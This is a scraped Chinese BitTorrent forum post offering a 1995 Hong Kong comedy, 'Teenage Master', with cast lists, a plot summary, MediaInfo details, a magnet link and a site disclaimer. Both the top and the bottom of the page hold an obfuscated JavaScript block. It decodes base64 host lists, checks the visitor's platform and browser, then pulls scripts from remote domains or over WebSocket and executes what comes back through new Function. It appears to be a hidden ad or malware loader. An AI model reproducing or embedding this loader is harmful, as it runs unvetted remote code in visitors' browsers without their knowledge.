小飞侠[国粤配音/中文字幕].Teenage.Master.1995.WEB-DL.1080p.H265.AAC.2Audios 2.95GB

版主小s 25天前 225

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 小飞侠 / Teenage Master

◎片 名 小飛俠

◎年 代 1995

◎产 地 中国香港

◎类 别 喜剧

◎语 言 粤语

◎上映日期 1995-03-25(中国香港)

◎IMDb链接 https://www.imdb.com/title/tt0115001/

◎豆瓣评分 6.8/10 (13062人评价)

◎豆瓣链接 https://movie.douban.com/subject/1578510/

◎片 长 88分钟

◎导 演 林伟伦 Wai-Lun Lam (id:1320058)

◎编 剧 刘俊纬 A-Wei (id:1316605)

卓冰 Bing Cheuk (id:1320061)

司徒慧焯 Roy Szeto (id:1298762)

梁伟庭 Wai Ting Leung (id:1320063)

刘俊伟 Lawrence Lau (id:1336696)

◎演 员 谢苗 Miu Tse (id:1314627)

吴孟达 Man Tat Ng (id:1016771)

卢惠光 Ken Lo (id:1032633)

郑柏林 Jacky Cheng (id:1322245)

邹兆龙 Collin Chou (id:1022821)

罗慧娟 Jacqueline Law (id:1275414)

谷德昭 Vincent Kok (id:1025526)

李兆基 Siu-Kei Lee (id:1275475)

梁荣忠 Wing-Chung Leung (id:1315034)

李名炀 Ming-yang Li (id:1289688)

陈治良 Frankie Chin (id:1328403)

宋本中 Boon-Chung Sung (id:1322129)

胡立成 Licheng Hu (id:1331134)

史美仪 Mei-Yee Shut (id:1322479)

李晓彤 Tina Lee (id:1421000)

王晶 Jing Wong (id:1274331)

李兆基 Siu-Kei Lee (id:1275475)

郑兆强 Siu-keung Cheng (id:1280597)

罗礼贤 Bruce Law (id:1289542)

◎标 签 喜剧 / 香港 / 动作 / 搞笑 / 童年回忆 / 儿童 / 1995 / 电影

◎简 介

两父子谢峻(卢惠光饰)、谢飞(谢苗饰)号称是世界上武功最高的父子,果不其然,他们勇闯虎穴打败独角猩猩兽,救出了被关在山中的小公主。其实只是他们的一场英雄美梦。一日,谢父正在教授村民功夫时,突然接到师公的求救信号。为了满足师公的心愿,谢飞和父亲谢峻只好偷渡来到香港。当两人前去解救时,发现师公已被关进精神病院。不仅如此,父子二人还莫名其妙地被卷入一起抢劫珠宝杀人案中。在警察的追捕中,父子失散。

在香港这个复杂的花花世界里,失散后的父子俩发生了一段段有趣的故事。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 282860132214357169319162417919658241216 (0xD4CCE13F315E5C17AE3D1C06C89F2CC0)

  4. Complete name : Teenage Master 1995 WEB-DL 1080p H265 AAC [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 2.95 GiB

  8. Duration : 1 h 28 min

  9. Overall bit rate : 4 799 kb/s

  10. Encoded date : UTC 2021-11-05 17:51:50

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 28 min

  20. Bit rate : 4 543 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.091

  30. Stream size : 2.80 GiB (95%)

  31. Default : Yes

  32. Forced : No


  33. Audio #1

  34. ID : 2

  35. Format : AAC LC

  36. Format/Info : Advanced Audio Codec Low Complexity

  37. Codec ID : A_AAC-2

  38. Duration : 1 h 28 min

  39. Bit rate : 126 kb/s

  40. Channel(s) : 2 channels

  41. Channel layout : L R

  42. Sampling rate : 44.1 kHz

  43. Frame rate : 43.066 FPS (1024 SPF)

  44. Compression mode : Lossy

  45. Stream size : 79.2 MiB (3%)

  46. Title : 国语

  47. Language : Chinese

  48. Default : Yes

  49. Forced : No


  50. Audio #2

  51. ID : 3

  52. Format : AAC LC

  53. Format/Info : Advanced Audio Codec Low Complexity

  54. Codec ID : A_AAC-2

  55. Duration : 1 h 28 min

  56. Bit rate : 126 kb/s

  57. Channel(s) : 2 channels

  58. Channel layout : L R

  59. Sampling rate : 44.1 kHz

  60. Frame rate : 43.066 FPS (1024 SPF)

  61. Compression mode : Lossy

  62. Stream size : 79.2 MiB (3%)

  63. Title : 粤语

  64. Language : Chinese

  65. Default : No

  66. Forced : No


  67. Text #1

  68. ID : 4

  69. Format : UTF-8

  70. Codec ID : S_TEXT/UTF8

  71. Codec ID/Info : UTF-8 Plain Text

  72. Duration : 1 h 25 min

  73. Bit rate : 50 b/s

  74. Count of elements : 1384

  75. Stream size : 31.9 KiB (0%)

  76. Title : 简体中文

  77. Language : Chinese

  78. Default : Yes

  79. Forced : No


  80. Text #2

  81. ID : 5

  82. Format : UTF-8

  83. Codec ID : S_TEXT/UTF8

  84. Codec ID/Info : UTF-8 Plain Text

  85. Duration : 1 h 25 min

  86. Bit rate : 51 b/s

  87. Count of elements : 1367

  88. Stream size : 32.0 KiB (0%)

  89. Title : 繁体中文

  90. Language : Chinese

  91. Default : No

  92. Forced : No


  93. Text #3

  94. ID : 6

  95. Format : UTF-8

  96. Codec ID : S_TEXT/UTF8

  97. Codec ID/Info : UTF-8 Plain Text

  98. Duration : 1 h 25 min

  99. Bit rate : 79 b/s

  100. Count of elements : 1381

  101. Stream size : 49.6 KiB (0%)

  102. Title : 阿拉伯语

  103. Language : Arabic

  104. Default : No

  105. Forced : No


  106. Text #4

  107. ID : 7

  108. Format : UTF-8

  109. Codec ID : S_TEXT/UTF8

  110. Codec ID/Info : UTF-8 Plain Text

  111. Duration : 1 h 25 min

  112. Bit rate : 63 b/s

  113. Count of elements : 1383

  114. Stream size : 39.9 KiB (0%)

  115. Title : 印尼语

  116. Language : Indonesian

  117. Default : No

  118. Forced : No


  119. Text #5

  120. ID : 8

  121. Format : UTF-8

  122. Codec ID : S_TEXT/UTF8

  123. Codec ID/Info : UTF-8 Plain Text

  124. Duration : 1 h 25 min

  125. Bit rate : 148 b/s

  126. Count of elements : 1384

  127. Stream size : 93.0 KiB (0%)

  128. Title : 泰语

  129. Language : Thai

  130. Default : No

  131. Forced : No


  132. Text #6

  133. ID : 9

  134. Format : UTF-8

  135. Codec ID : S_TEXT/UTF8

  136. Codec ID/Info : UTF-8 Plain Text

  137. Duration : 1 h 25 min

  138. Bit rate : 61 b/s

  139. Count of elements : 1383

  140. Stream size : 38.8 KiB (0%)

  141. Title : 葡萄牙语

  142. Language : Portuguese

  143. Default : No

  144. Forced : No


  145. Text #7

  146. ID : 10

  147. Format : UTF-8

  148. Codec ID : S_TEXT/UTF8

  149. Codec ID/Info : UTF-8 Plain Text

  150. Duration : 1 h 25 min

  151. Bit rate : 59 b/s

  152. Count of elements : 1383

  153. Stream size : 37.0 KiB (0%)

  154. Title : 西班牙语

  155. Language : Spanish

  156. Default : No

  157. Forced : No


  158. Text #8

  159. ID : 11

  160. Format : UTF-8

  161. Codec ID : S_TEXT/UTF8

  162. Codec ID/Info : UTF-8 Plain Text

  163. Duration : 1 h 25 min

  164. Bit rate : 82 b/s

  165. Count of elements : 1384

  166. Stream size : 51.9 KiB (0%)

  167. Title : 越南语

  168. Language : Vietnamese

  169. Default : No

  170. Forced : No


  171. Text #9

  172. ID : 12

  173. Format : UTF-8

  174. Codec ID : S_TEXT/UTF8

  175. Codec ID/Info : UTF-8 Plain Text

  176. Duration : 1 h 25 min

  177. Bit rate : 62 b/s

  178. Count of elements : 1384

  179. Stream size : 39.2 KiB (0%)

  180. Title : 马来语

  181. Language : Malay

  182. Default : No

  183. Forced : No


  184. Text #10

  185. ID : 13

  186. Format : UTF-8

  187. Codec ID : S_TEXT/UTF8

  188. Codec ID/Info : UTF-8 Plain Text

  189. Duration : 1 h 25 min

  190. Bit rate : 53 b/s

  191. Count of elements : 1361

  192. Stream size : 33.7 KiB (0%)

  193. Title : 英语

  194. Language : English

  195. Default : No

  196. Forced : No




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:7772D0097278CD22F08317ED09DBB97AA46F9168

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};